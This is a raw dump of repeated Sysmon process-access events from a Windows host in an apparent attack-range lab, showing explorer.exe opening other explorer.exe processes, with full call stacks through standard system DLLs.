16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 